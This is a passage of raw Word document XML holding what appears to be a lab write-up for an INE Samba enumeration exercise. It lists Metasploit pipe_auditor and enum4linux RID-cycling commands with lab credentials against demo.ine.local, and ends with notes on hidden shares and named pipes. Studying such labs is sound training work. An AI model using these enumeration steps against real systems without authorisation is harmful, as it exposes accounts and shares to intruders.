        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Step 7:</w:t>
      </w:r>
      <w:r w:rsidRPr="005D7543">
        <w:t xml:space="preserve"> List the named pipes available over SMB on the samba server? Use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D7543">
        <w:t>pipe_auditor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005D7543">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D7543">
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005D7543">
        <w:t xml:space="preserve"> module with credentials obtained from question 2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6807C572" w14:textId="77777777" w:rsidR="005D7543" w:rsidRPr="005D7543" w:rsidRDefault="005D7543" w:rsidP="005D7543">
      <w:r w:rsidRPr="005D7543">
        <w:t xml:space="preserve">Answer: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D7543">
        <w:t>netlogon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005D7543">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D7543">
        <w:t>lsarpc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005D7543">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D7543">
        <w:t>samr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005D7543">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D7543">
        <w:t>eventlog</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005D7543">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D7543">
        <w:t>InitShutdown</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005D7543">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D7543">
        <w:t>ntsvcs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005D7543">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D7543">
        <w:t>srvsvc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005D7543">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D7543">
        <w:t>wkssvc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0D2E868D" w14:textId="77777777" w:rsidR="005D7543" w:rsidRPr="005D7543" w:rsidRDefault="005D7543" w:rsidP="005D7543">
      <w:r w:rsidRPr="005D7543">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CEC846C" w14:textId="77777777" w:rsidR="005D7543" w:rsidRPr="005D7543" w:rsidRDefault="005D7543" w:rsidP="005D7543">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D7543">
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005D7543">
        <w:t xml:space="preserve"> -q</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A0FBBA" w14:textId="77777777" w:rsidR="005D7543" w:rsidRPr="005D7543" w:rsidRDefault="005D7543" w:rsidP="005D7543">
      <w:r w:rsidRPr="005D7543">
        <w:t>use auxiliary/scanner/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D7543">
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005D7543">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D7543">
        <w:t>pipe_auditor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="42E5D5E7" w14:textId="77777777" w:rsidR="005D7543" w:rsidRPr="005D7543" w:rsidRDefault="005D7543" w:rsidP="005D7543">
      <w:r w:rsidRPr="005D7543">
        <w:t xml:space="preserve">set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D7543">
        <w:t>SMBUser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005D7543">
        <w:t xml:space="preserve"> admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064BD5C4" w14:textId="77777777" w:rsidR="005D7543" w:rsidRPr="005D7543" w:rsidRDefault="005D7543" w:rsidP="005D7543">
      <w:r w:rsidRPr="005D7543">
        <w:t xml:space="preserve">set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D7543">
        <w:t>SMBPass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005D7543">
        <w:t xml:space="preserve"> password1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26546153" w14:textId="77777777" w:rsidR="005D7543" w:rsidRPr="005D7543" w:rsidRDefault="005D7543" w:rsidP="005D7543">
      <w:r w:rsidRPr="005D7543">
        <w:t xml:space="preserve">set RHOSTS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005D7543">
        <w:t>demo.ine.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0E266B92" w14:textId="77777777" w:rsidR="005D7543" w:rsidRPr="005D7543" w:rsidRDefault="005D7543" w:rsidP="005D7543">
      <w:r w:rsidRPr="005D7543">
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F97F47" w14:textId="0AFB1B9B" w:rsidR="005D7543" w:rsidRDefault="005D7543" w:rsidP="005D7543"/>
    <w:p w14:paraId="71EACECB" w14:textId="474E8283" w:rsidR="008D6713" w:rsidRPr="005D7543" w:rsidRDefault="008D6713" w:rsidP="005D7543">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="29F1ABEA" wp14:editId="05B1AE21">
            <wp:extent cx="5810549" cy="4292821"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1883300257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300257" name="Picture 188330025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0549" cy="4292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4AC52" w14:textId="77777777" w:rsidR="005D7543" w:rsidRPr="005D7543" w:rsidRDefault="005D7543" w:rsidP="005D7543">
      <w:r w:rsidRPr="005D7543">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 8:</w:t>
      </w:r>
      <w:r w:rsidRPr="005D7543">
        <w:t xml:space="preserve"> List </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D7543">
        <w:t>sid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005D7543">
        <w:t xml:space="preserve"> of Unix users </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D7543">
        <w:t>shawn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005D7543">
        <w:t xml:space="preserve">, jane, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D7543">
        <w:t>nancy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005D7543">
        <w:t xml:space="preserve"> and admin respectively by performing RID cycling using enum4Linux with credentials obtained in question 2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA3A46D" w14:textId="77777777" w:rsidR="005D7543" w:rsidRPr="005D7543" w:rsidRDefault="005D7543" w:rsidP="005D7543">
      <w:r w:rsidRPr="005D7543">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E7ACE2" w14:textId="77777777" w:rsidR="005D7543" w:rsidRPr="005D7543" w:rsidRDefault="005D7543" w:rsidP="005D7543">
      <w:r w:rsidRPr="005D7543">
        <w:t xml:space="preserve">enum4linux -r -u "admin" -p "password1" </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005D7543">
        <w:t>demo.ine.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6CE03849" w14:textId="3AA7FF11" w:rsidR="005D7543" w:rsidRPr="005D7543" w:rsidRDefault="00C51018" w:rsidP="005D7543">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="59F1106E" wp14:editId="498E061F">
            <wp:extent cx="5797848" cy="4515082"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1472113821" name="Picture 32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113821" name="Picture 32" descr="A computer screen shot of a computer program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7848" cy="4515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C2EB8" w14:textId="6B4A3515" w:rsidR="005D7543" w:rsidRPr="005D7543" w:rsidRDefault="00C51018" w:rsidP="005D7543">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="18E35F57" wp14:editId="45A51186">
            <wp:extent cx="5537485" cy="4451579"/>
            <wp:effectExtent l="0" t="0" r="6350" b="6350"/>
            <wp:docPr id="710255867" name="Picture 3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255867" name="Picture 33" descr="A screenshot of a computer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7485" cy="4451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93FC1" w14:textId="77777777" w:rsidR="005D7543" w:rsidRPr="005D7543" w:rsidRDefault="005D7543" w:rsidP="005D7543">
      <w:r w:rsidRPr="005D7543">
        <w:t>Answer: S-1-22-1-1000, S-1-22-1-1001, S-1-22-1-1002, S-1-22-1-1003</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E27C764" w14:textId="77777777" w:rsidR="005D7543" w:rsidRDefault="005D7543"/>
    <w:p w14:paraId="64CB0BBD" w14:textId="77777777" w:rsidR="005D7543" w:rsidRDefault="005D7543"/>
    <w:p w14:paraId="650A53B6" w14:textId="068724D1" w:rsidR="00D54B3A" w:rsidRDefault="00D54B3A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="099C1DD3" wp14:editId="4CD1FA47">
            <wp:extent cx="4413477" cy="1206562"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="427286280" name="Picture 34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286280" name="Picture 34" descr="A screen shot of a computer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3477" cy="120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35147" w14:textId="77777777" w:rsidR="00D54B3A" w:rsidRDefault="00D54B3A"/>
    <w:p w14:paraId="407D2FB3" w14:textId="32947766" w:rsidR="00617110" w:rsidRPr="00617110" w:rsidRDefault="00617110">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617110">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NOTE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245F945B" w14:textId="77777777" w:rsidR="00617110" w:rsidRPr="00617110" w:rsidRDefault="00617110" w:rsidP="00617110">
      <w:r w:rsidRPr="00617110">
        <w:t xml:space="preserve">If a share </w:t>
      </w:r>
      <w:r w:rsidRPr="00617110">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>does not appear</w:t>
      </w:r>
      <w:r w:rsidRPr="00617110">
        <w:t xml:space="preserve"> in</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01CB3BE2" w14:textId="77777777" w:rsidR="00617110" w:rsidRPr="00617110" w:rsidRDefault="00617110" w:rsidP="00617110">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00617110">
        <w:t>smbclient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00617110">
        <w:t xml:space="preserve"> -L </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00617110">
        <w:t>demo.ine.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00617110">
        <w:t xml:space="preserve"> -U jane</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC4F1E4" w14:textId="77777777" w:rsidR="00617110" w:rsidRPr="00617110" w:rsidRDefault="00617110" w:rsidP="00617110">
      <w:r w:rsidRPr="00617110">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">but you can still </w:t>
      </w:r>
      <w:r w:rsidRPr="00617110">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>directly access it</w:t>
      </w:r>
      <w:r w:rsidRPr="00617110">
        <w:t xml:space="preserve"> with</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A8098C9" w14:textId="77777777" w:rsidR="00617110" w:rsidRPr="00617110" w:rsidRDefault="00617110" w:rsidP="00617110">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00617110">
        <w:t>smbclient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00617110">
        <w:t xml:space="preserve"> //</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00617110">
        <w:t>demo.ine.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00617110">
        <w:t>/jane -U jane</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12724997" w14:textId="77777777" w:rsidR="00617110" w:rsidRPr="00617110" w:rsidRDefault="00617110" w:rsidP="00617110">
      <w:r w:rsidRPr="00617110">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>➡️</w:t>
      </w:r>
      <w:r w:rsidRPr="00617110">
        <w:t xml:space="preserve"> This means:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="457DCEEB" w14:textId="77777777" w:rsidR="00617110" w:rsidRPr="00617110" w:rsidRDefault="00617110" w:rsidP="00617110">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00617110">
        <w:t xml:space="preserve">The share </w:t>
      </w:r>
      <w:r w:rsidRPr="00617110">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>exists</w:t>
      </w:r>
      <w:r w:rsidRPr="00617110">
        <w:t xml:space="preserve"> and is accessible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0677D588" w14:textId="77777777" w:rsidR="00617110" w:rsidRPr="00617110" w:rsidRDefault="00617110" w:rsidP="00617110">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00617110">
        <w:t xml:space="preserve">It is </w:t>
      </w:r>
      <w:r w:rsidRPr="00617110">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">not </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00617110">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>browseable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00617110">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (hidden)</w:t>
      </w:r>
      <w:r w:rsidRPr="00617110">
        <w:t xml:space="preserve">, because </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00617110">
        <w:t>browseable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00617110">
        <w:t xml:space="preserve"> shares show up in the -L listing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E4772CF" w14:textId="77777777" w:rsidR="00617110" w:rsidRPr="00617110" w:rsidRDefault="00617110" w:rsidP="00617110">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00617110">
        <w:t xml:space="preserve">However, if you </w:t>
      </w:r>
      <w:r w:rsidRPr="00617110">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>know the exact name</w:t>
      </w:r>
      <w:r w:rsidRPr="00617110">
        <w:t>, you can still connect and list/upload files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E06E65" w14:textId="77777777" w:rsidR="00617110" w:rsidRDefault="00617110"/>
    <w:p w14:paraId="50E7C4DE" w14:textId="6396AA39" w:rsidR="00C51018" w:rsidRPr="00C51018" w:rsidRDefault="00C51018" w:rsidP="00C51018">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C51018">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00C51018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Named</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C51018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> pipes</w:t>
      </w:r>
      <w:r w:rsidRPr="00C51018">
        <w:t xml:space="preserve"> are special files in Windows (like \\.\pipe\mypipe) used for inter-process communication (IPC).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66785DE0" w14:textId="77777777" w:rsidR="00C51018" w:rsidRPr="00C51018" w:rsidRDefault="00C51018" w:rsidP="00C51018">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C51018">
        <w:t>  When</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C51018">
        <w:t xml:space="preserve"> accessed </w:t>
      </w:r>
      <w:r w:rsidRPr="00C51018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>over SMB</w:t>
      </w:r>
      <w:r w:rsidRPr="00C51018">
        <w:t>, they appear through the hidden IPC$ share:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="084DDB98" w14:textId="32B6436D" w:rsidR="00C51018" w:rsidRDefault="00C51018"/>
    <w:sectPr w:rsidR="00C510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65DF1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4A6212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FA056A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DCCAB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4030518">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="7471204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0BB"/>
    <w:rsid w:val="003D3216"/>
    <w:rsid w:val="004A2BFD"/>
    <w:rsid w:val="005515C8"/>
    <w:rsid w:val="00551663"/>
    <w:rsid w:val="00595B1E"/>
    <w:rsid w:val="005D7543"/>
    <w:rsid w:val="00617110"/>
    <w:rsid w:val="006E60BB"/>
    <w:rsid w:val="00853ABF"/>
    <w:rsid w:val="008D6713"/>
    <w:rsid w:val="00C51018"/>
    <w:rsid w:val="00D54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9951E"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{F170F3D8-0E23-4839-9DA1-AB1A62714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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0B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1711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13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.tmp"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.tmp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tmp"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.tmp"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.tmp"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.tmp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image" Target="media/image7.tmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.jpeg"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.tmp"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.tmp"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.tmp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image" Target="media/image10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11</Pages>
  <Words>429</Words>
  <Characters>2451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11</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-09-19T07:24:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-09-19T08:01:00Z</dcterms:modified>
</cp:coreProperties>
</file>